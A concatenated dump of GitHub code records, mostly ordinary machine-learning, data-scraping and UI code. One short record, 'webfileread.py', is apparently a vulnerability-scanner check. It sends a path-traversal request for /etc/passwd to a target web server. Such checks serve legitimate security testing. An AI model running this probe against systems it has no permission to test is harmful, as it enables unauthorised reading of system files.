sample_list.append(v.numpy())\n for i in xrange(steps_between_samples):\n _, v = self.gibbs_vhv(v)\n return np.vstack(sample_list)\n\n # for constrastive divergence training\n def cd_step(self, v, train_mc_steps):\n h = sample_from_bernoulli(self.vis2hid(v))\n h_list = [\n h,\n ]\n v_list = []\n for i in xrange(train_mc_steps):\n new_v, new_h = self.gibbs_hvh(h_list[-1])\n v_list.append(new_v)\n h_list.append(new_h)\n chain_end = tf.stop_gradient(v_list[-1])\n return 
chain_end\n\n def pcd_step(self, v, train_mc_steps, persistent):\n h_list = [\n persistent,\n ]\n v_list = []\n for i in xrange(train_mc_steps):\n new_v, new_h = self.gibbs_hvh(h_list[-1])\n v_list.append(new_v)\n h_list.append(new_h)\n chain_end = tf.stop_gradient(v_list[-1])\n return chain_end, tf.stop_gradient(h_list[-1])\n\n def cd_loss(self, v_0, v_n):\n return tf.reduce_mean(\n self.free_energy(v_0), axis=0) - tf.reduce_mean(\n self.free_energy(v_n), axis=0)\n\n # reconstruction\n def reconstruction_error(self, v_0):\n h_1 = sample_from_bernoulli(self.vis2hid(v_0))\n v_1_logits = tf.matmul(h_1, tf.transpose(self.w)) + self.vis_b\n return tf.reduce_mean(\n tf.reduce_sum(\n tf.nn.sigmoid_cross_entropy_with_logits(\n labels=v_0, logits=v_1_logits),\n axis=1),\n axis=0)\n\n def params(self):\n return (self.hid_b, self.vis_b, self.w)\n\n\n# base rate RBM for AIS\n\n\nclass BRRBM(RBM):\n\n def __init__(self, vis_dim, hid_dim, data):\n self.vis_dim = vis_dim\n self.hid_dim = hid_dim\n self.w = tfe.Variable(tf.zeros([vis_dim, hid_dim]), dtype=tf.float32)\n self.hid_b = tfe.Variable(tf.zeros([self.hid_dim]), dtype=tf.float32)\n # MLE for the value of vis_b\n sample_mean = tf.reduce_mean(data, axis=0)\n # Smooth to make sure p(v) > 0 for every v\n sample_mean = tf.clip_by_value(sample_mean, 1e-5, 1 - 1e-5)\n self.vis_b = -tf.log(1. / sample_mean - 1.)\n self.log_z = tf.reduce_sum(\n tf.nn.softplus(self.vis_b), axis=0) + self.hid_dim * np.log(2.)\n\n # get tf samples\n def get_independent_samples_tf(self, num_samples, burn_in_steps=100):\n v = tf.zeros([num_samples, self.vis_dim], dtype=tf.float32)\n for i in xrange(burn_in_steps):\n _, v = self.gibbs_vhv(v)\n return v\n\n\n# Mix RBM for AIS\n\n\nclass MIXRBM(RBM):\n\n def tune(self, brrbm, rbm, weight):\n # adjust parameters of the mixed RBM\n n = brrbm.hid_dim\n self.vis_b = (1. - weight) * brrbm.vis_b + weight * rbm.vis_b\n self.hid_b = tf.concat(\n [(1. - weight) * brrbm.hid_b, weight * rbm.hid_b], axis=0)\n self.w = tf.concat([(1. 
- weight) * brrbm.w, weight * rbm.w], axis=1)\n","repo_name":"DoubleBlindReviewShareCode/anonymous_link_AdVIL_code","sub_path":"RBM.py","file_name":"RBM.py","file_ext":"py","file_size_in_byte":9258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"8170625834","text":"import os, requests, time\n\nimport datetime\nfrom google.transit import gtfs_realtime_pb2\nfrom dotenv import load_dotenv, find_dotenv\nfrom protobuf_to_dict import protobuf_to_dict\n\n\nMTA_URL = 'http://datamine.mta.info/mta_esi.php'\nTIMES_TO_GET = 6\n\n\nclass TrainInfo:\n def __init__(self, api_key, feed_id, station):\n self.api_key = api_key\n self.feed_id = feed_id\n self.station = station\n self.feed_message = gtfs_realtime_pb2.FeedMessage()\n \n @staticmethod\n def get_train_time_with_label(train, arrival_time, now):\n minutes_until_train = (arrival_time - int(now)) // 60\n minutes = \"{}\".format(minutes_until_train)\n return \"{}: {}\".format(train, minutes)\n\n @staticmethod\n def get_train_time_minutes(arrival_time, now):\n minutes_until_train = (arrival_time - int(now)) // 60\n return \"{}\".format(minutes_until_train)\n\n @staticmethod\n def format_train_time(arrival_time):\n arrival_time = time.localtime(arrival_time)\n return time.strftime(\"%H:%M\", arrival_time)\n\n def get_train_time_data(self, train_data):\n train_time_data = list()\n for trains in train_data:\n trip_update = trains.get('trip_update')\n if not trip_update:\n continue\n\n route_id = trip_update['trip']['route_id']\n\n stop_time_update = trip_update['stop_time_update']\n for stop_info in stop_time_update:\n if stop_info.get('stop_id') == self.station:\n arrival = stop_info.get('arrival')\n if not arrival:\n continue\n train_time_data.append((route_id, arrival['time']))\n return train_time_data\n\n def get_train_time_strings(self, train_time_data):\n if len(train_time_data) < 1:\n return 'no times'\n\n train_time_data.sort(key=lambda route_time: route_time[1])\n\n now = time.time()\n\n train_output = list()\n\n for i, train_arrival_time in enumerate(train_time_data[:TIMES_TO_GET]):\n train, arrival_time = train_arrival_time\n minutes_until_arrival = (arrival_time - int(now)) / 60\n if minutes_until_arrival < 1:\n continue\n\n train_output.append(self.format_train_time(arrival_time))\n\n return ' '.join(train_output) + ' '\n\n def get_train_identifiers_for_all_feeds(self):\n def get_train_ids(feed_entities):\n for entity in feed_entities:\n trip_update = entity.get('trip_update')\n if not trip_update:\n continue\n trip = trip_update['trip']\n if not trip:\n continue\n route_id = trip.get('route_id')\n if route_id:\n yield route_id\n\n possible_feed_ids = range(1, 60)\n\n for feed_id in possible_feed_ids:\n feed = self.get_feed(feed_id=feed_id)\n if feed:\n train_ids = ','.join(set(get_train_ids(feed)))\n yield 'feed_id={}: {}'.format(feed_id, train_ids)\n\n def get_train_text(self):\n feed = self.get_feed()\n if not feed:\n # TODO log an exception\n return\n train_time_data = self.get_train_time_data(feed)\n return self.get_train_time_strings(train_time_data)\n\n def get_feed(self, feed_id=None):\n feed_id = feed_id or self.feed_id\n query_str = '?key={}&feed_id={}'.format(\n self.api_key, feed_id\n )\n response = requests.get(MTA_URL + query_str)\n\n try:\n self.feed_message.ParseFromString(response.content)\n subway_feed = protobuf_to_dict(self.feed_message)\n return subway_feed['entity']\n except Exception:\n return\n\n\nif __name__ == \"__main__\":\n load_dotenv(find_dotenv())\n 
MTA_API_KEY = os.environ['MTA_API_KEY']\n FEED_IDS = os.environ['FEED_IDS'].split(',')\n STATIONS = os.environ['STOPS'].split(',')\n\n if True: # TODO add flag\n for feed_id, station in zip(FEED_IDS, STATIONS):\n ti = TrainInfo(api_key=MTA_API_KEY,\n feed_id=feed_id,\n station=station)\n print(ti.get_train_text())\n else:\n ti = TrainInfo(api_key=MTA_API_KEY, feed_id=None, station=None)\n print('\\n'.join(list(ti.get_train_identifiers_for_all_feeds())))\n\n\n","repo_name":"redSlug/weather-reporter","sub_path":"server/client/train_info.py","file_name":"train_info.py","file_ext":"py","file_size_in_byte":4456,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"4"} +{"seq_id":"19884063900","text":"#!/usr/bin/env python\n\"\"\"This plugin adds artifact functionality to the UI.\"\"\"\n\nimport itertools\nimport StringIO\n\nfrom grr.gui import renderers\nfrom grr.gui.plugins import fileview\nfrom grr.gui.plugins import forms\nfrom grr.gui.plugins import semantic\nfrom grr.lib import aff4\nfrom grr.lib import artifact\nfrom grr.lib import artifact_lib\nfrom grr.lib import parsers\nfrom grr.lib import rdfvalue\n\n\nclass ArtifactListRenderer(forms.MultiSelectListRenderer):\n \"\"\"Renderer for listing the available Artifacts.\"\"\"\n\n type = rdfvalue.ArtifactName\n\n artifact_template = (\"\"\"\n
    \n    \n    \n \n \n \n \n \n \n \n    Labels    Platforms    Conditions    Dependencies    Links    Output Type    \n    Artifact Collectors    \n \n \n    \n    Artifact Processors    \n \n \n    \n    \"\"\")\n\n  layout_template = (\n      \"\"\"    \"\"\"\n + forms.TypeDescriptorFormRenderer.default_description_view + \"\"\"\n    \n    \n \n \n \n \n \n \n \n    \n    \n    \n \n    \n \n \"\"\"\n + artifact_template + \"\"\"\n    \n Add\n Add all \n \n Clear\n Remove \n \n    \n    \n    \n\n
    \n\"\"\")\n\n def Layout(self, request, response):\n \"\"\"Get available artifact information for display.\"\"\"\n # Get all artifacts that aren't Bootstrap and aren't the base class.\n self.artifacts = {}\n artifact.LoadArtifactsFromDatastore(token=request.token)\n for name, artifact_val in artifact_lib.ArtifactRegistry.artifacts.items():\n if set([\"Bootstrap\"]).isdisjoint(artifact_val.labels):\n self.artifacts[name] = artifact_val\n self.labels = artifact_lib.ARTIFACT_LABELS\n\n # Convert artifacts into a dict usable from javascript.\n artifact_dict = {}\n for artifact_name, artifact_val in self.artifacts.items():\n artifact_dict[artifact_name] = artifact_val.ToExtendedDict()\n processors = []\n for processor in parsers.Parser.GetClassesByArtifact(artifact_name):\n processors.append({\"name\": processor.__name__,\n \"output_types\": processor.output_types,\n \"doc\": processor.GetDescription()})\n artifact_dict[artifact_name][\"processors\"] = processors\n\n # Skip the our parent and call the TypeDescriptorFormRenderer direct.\n response = renderers.TypeDescriptorFormRenderer.Layout(self, request,\n response)\n return self.CallJavascript(response, \"ArtifactListRenderer.Layout\",\n prefix=self.prefix,\n artifacts=artifact_dict,\n supported_os=artifact_lib.SUPPORTED_OS_LIST,\n labels=self.labels)\n\n\nclass ArtifactRDFValueRenderer(semantic.RDFValueRenderer):\n \"\"\"A special renderer for ArtifactRDFValues.\"\"\"\n\n classname = \"Artifact\"\n\n layout_template = renderers.Template(\n \"\"\"\n
    \"\"\"\n + ArtifactListRenderer.artifact_template + \"\"\"\n
    \n\"\"\")\n\n def Layout(self, request, response):\n self.artifact_str = self.proxy.ToPrettyJson()\n response = super(ArtifactRDFValueRenderer, self).Layout(request, response)\n return self.CallJavascript(response, \"ArtifactRDFValueRenderer.Layout\",\n artifact_str=self.artifact_str)\n\n\nclass ArtifactRawRDFValueRenderer(semantic.RDFValueRenderer):\n \"\"\"A renderer for showing JSON format for ArtifactRDFValues.\"\"\"\n\n classname = \"Artifact\"\n\n layout_template = renderers.Template(\n \"
    {{this.artifact_str|escape}}
    \")\n\n def Layout(self, request, response):\n self.artifact_str = self.proxy.ToPrettyJson(extended=True)\n super(ArtifactRawRDFValueRenderer, self).Layout(request, response)\n\n\nclass ArtifactManagerView(renderers.TableRenderer):\n \"\"\"Artifact Manager table with toolbar.\"\"\"\n\n description = \"Artifact Manager\"\n behaviours = frozenset([\"Configuration\"])\n order = 50\n\n toolbar = \"ArtifactManagerToolbar\"\n\n def __init__(self, **kwargs):\n super(ArtifactManagerView, self).__init__(**kwargs)\n self.AddColumn(semantic.RDFValueColumn(\"Artifact Name\", width=\"5%\"))\n self.AddColumn(semantic.RDFValueColumn(\n \"Artifact Details\", width=\"50%\", renderer=ArtifactRDFValueRenderer))\n self.AddColumn(semantic.RDFValueColumn(\n \"Artifact Raw\", width=\"40%\", renderer=ArtifactRawRDFValueRenderer))\n\n def BuildTable(self, start_row, end_row, request):\n \"\"\"Builds table artifacts.\"\"\"\n artifact_urn = rdfvalue.RDFURN(\"aff4:/artifact_store\")\n try:\n collection = aff4.FACTORY.Open(artifact_urn,\n aff4_type=\"RDFValueCollection\",\n token=request.token)\n except IOError:\n return\n\n self.size = len(collection)\n row_index = start_row\n for value in itertools.islice(collection, start_row, end_row):\n self.AddCell(row_index, \"Artifact Name\", value.name)\n self.AddCell(row_index, \"Artifact Details\", value)\n self.AddCell(row_index, \"Artifact Raw\", value)\n row_index += 1\n\n def Layout(self, request, response):\n \"\"\"Populate the table state with the request.\"\"\"\n if self.toolbar:\n tb_cls = renderers.Renderer.classes[self.toolbar]\n tb_cls().Layout(request, response)\n return super(ArtifactManagerView, self).Layout(request, response)\n\n\nclass ArtifactManagerToolbar(renderers.TemplateRenderer):\n \"\"\"A navigation enhancing toolbar.\n\n Internal State:\n - aff4_path: The path we are viewing now in the table.\n \"\"\"\n post_parameters = [\"aff4_path\"]\n event_queue = \"file_select\"\n\n layout_template = renderers.Template(\"\"\"\n
      \n    • \n \n\n \n    • \n\n    \n\n    \n    \n    \n    \n \n    Upload File    \n    \n    \n    \n \n    \n    \n    \n    \n\n    \n    \n\n\"\"\")\n\n  def Layout(self, request, response):\n    response = super(ArtifactManagerToolbar, self).Layout(request, response)\n    return self.CallJavascript(response, \"ArtifactManagerToolbar.Layout\")\n\n\nclass DeleteArtifactsConfirmationDialog(renderers.ConfirmationDialogRenderer):\n  \"\"\"Dialog that asks for confirmation to delete uploaded artifacts.\n\n  Note that this only deletes artifacts that have been uploaded via the\n  ArtifactManager. Artifacts loaded from the artifacts directory are\n  unaffected.\n  \"\"\"\n\n  content_template = renderers.Template(\"\"\"\n    Are you sure you want to delete all\nuploaded artifacts?    \n\"\"\")\n\n  ajax_template = renderers.Template(\"\"\"\n    Uploaded artifacts were deleted successfully.
    \n\"\"\")\n\n def RenderAjax(self, request, response):\n aff4.FACTORY.Delete(\"aff4:/artifact_store\", token=request.token)\n return self.RenderFromTemplate(self.ajax_template, response,\n unique=self.unique, this=self)\n\n\nclass ArtifactJsonUploadView(fileview.UploadView):\n \"\"\"Renders a binary upload page.\"\"\"\n post_parameters = []\n upload_handler = \"ArtifactUploadHandler\"\n storage_path = \"aff4:/artifact_store\"\n\n\nclass ArtifactUploadHandler(fileview.UploadHandler):\n \"\"\"Handles upload of a binary config file such as a driver.\"\"\"\n\n def RenderAjax(self, request, response):\n \"\"\"Handle the upload via ajax.\"\"\"\n try:\n self.uploaded_file = request.FILES.items()[0][1]\n content = StringIO.StringIO()\n for chunk in self.uploaded_file.chunks():\n content.write(chunk)\n self.dest_path = artifact.UploadArtifactYamlFile(\n content.getvalue(), token=request.token)\n\n return renderers.TemplateRenderer.Layout(self, request, response,\n self.success_template)\n except (IOError, artifact_lib.ArtifactDefinitionError) as e:\n self.error = \"Could not write artifact to database %s\" % e\n return renderers.TemplateRenderer.Layout(self, request, response,\n self.error_template)\n","repo_name":"ForensicTools/GRREAT-475_2141-Chaigon-Failey-Siebert","sub_path":"gui/plugins/artifact_view.py","file_name":"artifact_view.py","file_ext":"py","file_size_in_byte":10809,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"4"} +{"seq_id":"20435045990","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n# coding=utf8\n\n\"\"\"\nPython协程示例\n\"\"\"\n\n\ndef display():\n r = ''\n while True:\n n = yield r # 获取send的参数n,并且返回r\n\n if not n:\n return\n print('[----]display %d' % n)\n r = 'Next'\n print('You can not see me.')\n\n\ndef sendMessage(c):\n c.send(None) # 启动生成器\n n = 0\n while n < 5:\n n = n + 1\n print('[SEND]send %d' % n)\n r = c.send(n)\n print('[SEND]get: %s' % r)\n c.close()\n\n\ndef demo1():\n d = display # 和协程用法无关,仅为对比\n print(d) # \n\n c = display() # 因为函数里包含yield,因此这里解释器并不会掉用(也并不是获取函数指针)\n print(c) # \n sendMessage(c)\n\n\nif __name__ == '__main__':\n demo1()\n","repo_name":"pengyuwei/learning-backend","sub_path":"python/thread/coroutines.py","file_name":"coroutines.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"19414389966","text":"import numpy as np\r\nimport pickle\r\nimport time\r\n\r\n\r\ndef pq(data, P, init_centroids, max_iter):\r\n def Split_P_data(Data_File, p):\r\n data = np.array(Data_File)\r\n data = np.array_split(data, p, axis=1)\r\n return data\r\n\r\n def Update_centr(p, centroids, data, N_cluster):\r\n for i_p in range(p):\r\n for j_index, j_row in enumerate(data[i_p]):\r\n # one of data to all centers distance\r\n one_L1_dis = np.sum(abs(centroids[i_p] - j_row), axis=1)\r\n one_L1 = np.where(one_L1_dis == np.min(one_L1_dis, axis=0))\r\n N_cluster[i_p][j_index] = one_L1[0][0]\r\n for i_p in range(p):\r\n for j_index, j_row in enumerate(centroids[i_p]):\r\n indexs = np.where(N_cluster[i_p] == j_index)\r\n if len(indexs[0]) == 0:\r\n continue\r\n else:\r\n for d_index, d in enumerate(indexs[0]):\r\n if d_index == 0:\r\n line = np.array([data[i_p][d]])\r\n else:\r\n line = np.vstack((line, data[i_p][d]))\r\n # update onelne of centroid\r\n centroids[i_p][j_index] = np.median(line, axis=0)\r\n return centroids, N_cluster\r\n\r\n def K_means(p, centroids, data, N_cluster, max_iter):\r\n for i in 
range(max_iter):\r\n centroids, N_cluster = Update_centr(p, centroids, data, N_cluster)\r\n # final half update N_cluster\r\n for i_p in range(p):\r\n for j_index, j_row in enumerate(data[i_p]):\r\n # one of data to all centers distance\r\n one_L1_dis = np.sum(abs(centroids[i_p] - j_row), axis=1, dtype='float32')\r\n # find the min one for this row\r\n one_L1 = np.where(one_L1_dis == np.min(one_L1_dis, axis=0))\r\n N_cluster[i_p][j_index] = one_L1[0][0]\r\n return centroids, N_cluster\r\n data = Split_P_data(data, P)\r\n centroids = np.array(init_centroids, dtype='float32')\r\n # we can get p*N*1 array\r\n N_cluster = np.zeros([len(data[0]), P], dtype='uint8')\r\n N_cluster = np.array_split(N_cluster, P, axis=1)\r\n # assign value of N_cluster\r\n centroids, N_cluster = K_means(P, centroids, data, N_cluster, max_iter)\r\n a = N_cluster[0]\r\n for i in range(len(N_cluster)):\r\n if i == 0:\r\n continue\r\n a = np.hstack((a, N_cluster[i]))\r\n N_cluster = a\r\n # codebooks code\r\n return centroids, N_cluster\r\n\r\n\r\ndef query(queries, codebooks, codes, T):\r\n def caculate_one_p_line_dis(queries, codebooks, p):\r\n queries = np.array_split(queries, p, axis=0)\r\n a = np.zeros([256, p])\r\n for i in range(p):\r\n a[:, i] = np.sum(abs(codebooks[i] - queries[i]), axis=1)\r\n return a\r\n\r\n p = len(codes[0])\r\n QKP_dis_table = np.zeros([len(queries), 256, p])\r\n test = np.zeros([len(queries), 256, p])\r\n h = 0\r\n for i in range(len(queries)):\r\n one_line_queries = queries[i].T\r\n QKP_dis_table[i] = caculate_one_p_line_dis(one_line_queries, codebooks, p)\r\n\r\n dis_query_n = np.zeros([len(codes), 1])\r\n q_dis_query_n = np.zeros([len(queries), len(codes), 1])\r\n\r\n for q_index in range(len(queries)):\r\n for i in range(len(codes)):\r\n one_line_codes = []\r\n p_index = 0\r\n for j in codes[i]:\r\n one_line_codes.append(QKP_dis_table[q_index][j][p_index])\r\n p_index += 1\r\n dis_query_n[i] = sum(one_line_codes)\r\n q_dis_query_n[q_index] = dis_query_n\r\n sort_q_n = np.zeros([len(queries), len(codes), 1])\r\n for i in range(len(queries)):\r\n sort_q_dis_query_n = np.argsort(q_dis_query_n[i].T)\r\n sort_q_n[i] = sort_q_dis_query_n.T\r\n answer = set()\r\n answers = []\r\n for q_index in range(len(queries)):\r\n answer = set()\r\n t = 1\r\n extra = T\r\n for i in range(T):\r\n answer.add(int(sort_q_n[q_index][i][0]))\r\n last_one = sort_q_n[q_index][i][0]\r\n\r\n while t:\r\n\r\n next_one = sort_q_n[q_index][extra][0]\r\n if q_dis_query_n[q_index][int(next_one)][0] == q_dis_query_n[q_index][int(last_one)][0]:\r\n answer.add(int(next_one))\r\n extra += 1\r\n else:\r\n t = 0\r\n\r\n answers.append(answer)\r\n return answers\r\n\r\n\r\n# How to run your implementation for Part 1\r\nwith open('./toy_example/Data_File', 'rb') as f:\r\n data = pickle.load(f, encoding='bytes')\r\nwith open('./toy_example/Centroids_File', 'rb') as f:\r\n centroids = pickle.load(f, encoding='bytes')\r\nstart = time.time()\r\ncodebooks, codes = pq(data, P=2, init_centroids=centroids, max_iter=20)\r\nend = time.time()\r\ntime_cost_1 = end - start\r\nprint(f\"Part1: {time_cost_1} s\")\r\n\r\n# How to run your implementation for Part 2\r\nwith open('./toy_example/Query_File', 'rb') as f:\r\n queries = pickle.load(f, encoding='bytes')\r\nstart = time.time()\r\ncandidates = query(queries, codebooks, codes, T=10)\r\nend = time.time()\r\ntime_cost_2 = end - start\r\nprint(f\"Part2: {time_cost_2} 
s\")\r\nprint(candidates)\r\n","repo_name":"RJY66/COMP9318-20T1","sub_path":"9318Project1.py","file_name":"9318Project1.py","file_ext":"py","file_size_in_byte":5165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"17614398070","text":"import configparser\nimport gzip\nimport json\nimport os\nimport shutil\nimport time\n\nfrom TwitterAPI import TwitterAPI\n\n# Set up constants\n\nconfig = configparser.ConfigParser()\nconfig.read('./config/api_auth.cf')\nconsumer_key = config['AUTH']['consumer_key']\nconsumer_secret = config['AUTH']['consumer_secret']\naccess_token_key = config['AUTH']['access_token_key']\naccess_token_secret = config['AUTH']['access_token_secret']\n\nconfig.read('./config/conf.cf')\nwrite_file_name = config['FILE LOCS']['dirty_dataset_dir'] + '/dirty'\n# Get auth tokens, etc., initialize Twitter API connections\napi = TwitterAPI(consumer_key, consumer_secret, access_token_key, access_token_secret)\n\n# Get from the specified endpoint\nreq = api.request('statuses/sample', {})\n\n# Function to scrape, used to help restart scrapinging in case of error\ntime_start = time.time()\nnum_file = int(float(config['DATA INFO']['start_num']))\n\n\ndef scrape_stuff():\n counter = 0\n time_file = time.time()\n global num_file\n write_file = open(write_file_name + str(num_file) + '.txt', 'a+')\n time_elapsed = time.time()\n\n # Iterates over items given in request\n for item in req:\n if 'delete' in item or ('lang' in item and item['lang'] != 'en'):\n continue\n\n # Log progress\n if counter % 100 == 0:\n print('Seconds since start/last file/last 100: ' + str(time.time() - time_start) + ' // ' + str(\n time.time() - time_file) + ' // ' + str(time.time() - time_elapsed))\n print('Current progress: ' + str(counter))\n time_elapsed = time.time()\n counter += 1\n write_file.write(json.dumps(item) + '\\n')\n\n # Every 100,000 good tweets transfer them to a zip file\n if counter % 100000 == 0 and counter > 0:\n write_file.close()\n with open(write_file_name + str(num_file) + '.txt', 'rb') as f_in:\n with gzip.open(write_file_name + str(num_file) + '.txt.gz', 'wb') as f_out:\n shutil.copyfileobj(f_in, f_out)\n\n # Remove uncompressed\n os.remove(write_file_name + str(num_file) + '.txt')\n num_file += 1\n write_file = open(write_file_name + str(num_file) + '.txt', 'a+')\n time_file = time.time()\n\n\n# Loop to ensure continuous scraping\nwhile True:\n try:\n print('scraping')\n scrape_stuff()\n except Exception:\n req = api.request('statuses/sample', {})\n continue\n","repo_name":"ultraeric/TwitterBot","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"18611406136","text":"# -*- coding:utf-8 -*-\n\nimport socket\n\ndef verify(protocol,ip,port):\n url = protocol+'://'+ip+':'+str(port)\n timeout = 10\n print('testing if web container arbitrary file read vul')\n try:\n socket.setdefaulttimeout(timeout)\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((ip, int(port)))\n flag = b\"GET /../../../../../../../../../etc/passwd HTTP/1.1\\r\\n\\r\\n\"\n s.send(flag)\n data = s.recv(1024)\n s.close()\n if b'root:' in data and b'nobody:' in data:\n msg = 'There is web container arbitrary file read vul on url: ' +url+ ' .'\n number = 'v30'\n print(msg)\n return True,url,number,msg\n else:\n msg = 'There is no web container arbitrary file read vul'\n number = 'v0'\n return 
False,url,number,msg\n except Exception as e:\n msg = str(e)\n number = 'v0'\n return False,url,number,msg\n\n","repo_name":"7hang/Python-crack","sub_path":"V-Scrack/exp/payload/webfileread.py","file_name":"webfileread.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"4"} +{"seq_id":"37638792891","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass FPN(nn.Module):\n def __init__(self, C3_inplanes, C4_inplanes, C5_inplanes, planes=256):\n super(FPN, self).__init__()\n # planes = 256 channels\n self.P3_1 = nn.Conv2d(C3_inplanes, planes, kernel_size=1, padding=0)\n self.P3_2 = nn.Conv2d(planes, planes, kernel_size=3, padding=1)\n self.P4_1 = nn.Conv2d(C4_inplanes, planes, kernel_size=1, padding=0)\n self.P4_2 = nn.Conv2d(planes, planes, kernel_size=3, padding=1)\n self.P5_1 = nn.Conv2d(C5_inplanes, planes, kernel_size=1, padding=0)\n self.P5_2 = nn.Conv2d(planes, planes, kernel_size=3, padding=1)\n self.P6 = nn.Conv2d(C5_inplanes, planes, kernel_size=3, stride=2, padding=1)\n self.P7 = nn.Sequential(\n nn.ReLU(inplace=True),\n nn.Conv2d(planes, planes, kernel_size=3, stride=2, padding=1))\n\n def forward(self, inputs):\n [C3, C4, C5] = inputs\n P5 = self.P5_1(C5)\n P4 = self.P4_1(C4)\n P4 = F.interpolate(P5, size=(P4.shape[2], P4.shape[3]),\n mode='nearest') + P4\n P3 = self.P3_1(C3)\n P3 = F.interpolate(P4, size=(P3.shape[2], P3.shape[3]),\n mode='nearest') + P3\n P6 = self.P6(C5)\n P7 = self.P7(P6)\n\n P5 = self.P5_2(P5)\n P4 = self.P4_2(P4)\n P3 = self.P3_2(P3)\n\n del C3, C4, C5\n return [P3, P4, P5, P6, P7]\n\n\nif __name__ == \"__main__\":\n # Img size 672*640 -> C1 168*160 -> C2 168*160\n # -> C3 84*80 -> C4 42*40 -> C5 21*20\n # -> P3 84*80 -> P4 42*40 -> P5 21*20 -> P6 11*10 -> P7 6*5\n C3 = torch.randn([2, 128 * 4, 84, 80])\n C4 = torch.randn([2, 256 * 4, 42, 40])\n C5 = torch.randn([2, 512 * 4, 21, 20])\n\n model = FPN(128 * 4, 256 * 4, 512 * 4)\n out = model([C3, C4, C5])\n print(\"len(out):\", len(out))\n for i in range(len(out)):\n print(i + 1, out[i].shape)\n print(out[i])\n # torch.Size([2, 256, 84, 80])\n # torch.Size([2, 256, 42, 40])\n # torch.Size([2, 256, 21, 20])\n # torch.Size([2, 256, 11, 10])\n # torch.Size([2, 256, 6, 5])\n","repo_name":"HanXiaoyiGitHub/Simple-CV-Pytorch-master","sub_path":"models/detection/RetinaNet/neck/FPN.py","file_name":"FPN.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"4"} +{"seq_id":"21322869730","text":"import unittest\nimport sys\nimport copy\nsys.path.append(\"../src\")\n\nfrom contextShim import *\nfrom util.util import *\n\nclass TestContextShim(unittest.TestCase):\n def setUp(self):\n self.c = ContextShim()\n \n # SETUP\n db = {\"GroupsEnumerated\":3,\n \"Group0\":100,\"Group1\":102,\"Group2\":103,\n \"IdsAggregated\":5,\n \"Id0\":10, \"Id1\":20, \"Id2\":30, \"Id3\":40, \"Id4\":50\n }\n self.summary = ContextSummary(1, db)\n self.s = ContextSummarySerializer()\n \n db1 = {\"GroupsEnumerated\":3,\n \"Group0\":100,\"Group1\":101,\"Group2\":102\n }\n self.summary1 = ContextSummary(2, db1)\n self.summary1.setTimestamp(time.time())\n time.sleep(0.01)\n db2 = {\"GroupsEnumerated\":3,\n \"Group0\":100,\"Group1\":102,\"Group2\":103\n }\n self.summary2 = ContextSummary(3, db2)\n self.summary2.setTimestamp(time.time())\n \n self.group = None\n \n def test_getContextBytes(self):\n \"\"\"\n Set contextHandler for the shim, and the shim 
will give you\n correct bytes to send\n \"\"\"\n contextHandler = self.c.getContextHandler()\n contextHandler.setMyContext(self.summary)\n contextHandler.setReceivedSummaries({2:self.summary1, 3:self.summary2})\n self.summary1.setHops(1) # only shorter hops can be included\n self.summary2.setHops(1) # only shorter hops can be included\n \n # 100 is a group, and 1 has group0(100)\n # so addGroupDefinition adds 1 into the member of 100\n g = GroupDefinition(100)\n contextHandler.addGroupDefinition(g)\n self.group = contextHandler.get(100)\n \n numberToSend = contextHandler.getSummariesToSend()\n self.assertEqual(4, len(numberToSend))\n res = self.c.getContextBytes()\n self.assertEqual(448, len(res))\n return res\n \n def test_setprocessContextBytes(self):\n # get the stream buffer\n res = self.test_getContextBytes()\n summaries = self.c.processContextBytes(res)\n expecteds = [self.summary, self.summary2, self.summary1, self.group]\n hit = 0\n for summary in summaries:\n for expected in expecteds:\n # We can't compare summary and expected one by one\n # as summary has +1 in hops because processContextBytes increases it by 1\n \n #print summary\n #print expected\n if summary.getId() == expected.getId():\n hit += 1\n\n self.assertTrue(hit == 4)\n \n def test_sameExceptHops(self):\n summary = copy.deepcopy(self.summary)\n summary.setHops(100)\n self.assertTrue(summary.sameExceptHops(self.summary))\n \nif __name__ == \"__main__\":\n unittest.main(verbosity=2)","repo_name":"prosseek/GrapevinePython","sub_path":"test/testContextShim.py","file_name":"testContextShim.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"17106230085","text":"#MERGE THE HESSIAN FILTERED + THRESHOLDED IMAGES\nimport numpy as np\nimport nibabel as nib\nimport os\nfrom os import path\n\nLOWER_HESS_DIR = \"\" #PATH TO RESAMPLED + (LOWER SIGMA) HESSIAN FILTERED + THRESHOLDED DATA\nUPPER_HESS_DIR = \"\" #PATH TO RESAMPLED + (UPPER SIGMA) HESSIAN FILTERED + THRESHOLDED DATA\nMERGED_DIR = \"\" ##PATH TO RESAMPLED + COMPLETE HESSIAN FILTERED + THRESHOLDED DATA\n\nLOWER_HESS_IMG = sorted(os.listdir(LOWER_HESS_DIR))\nUPPER_HESS_IMG = sorted(os.listdir(UPPER_HESS_DIR))\n\nnew = list(zip(LOWER_HESS_IMG, UPPER_HESS_IMG))\n\nfor i, j in new:\n if \".nii.gz\" in i and j:\n lower_hess_img_dir = path.join(LOWER_HESS_DIR, i) #create directory for each file name as iterates through 'if' command\n upper_hess_img_dir = path.join(UPPER_HESS_DIR, j)\n MRA_l_hess = nib.load(lower_hess_img_dir) #load nifty file\n lower_hess = MRA_l_hess.get_fdata() #numpy array\n MRA_u_hess = nib.load(upper_hess_img_dir) # load nifty file\n upper_hess = MRA_u_hess.get_fdata() # numpy array\n full_img = lower_hess + upper_hess\n 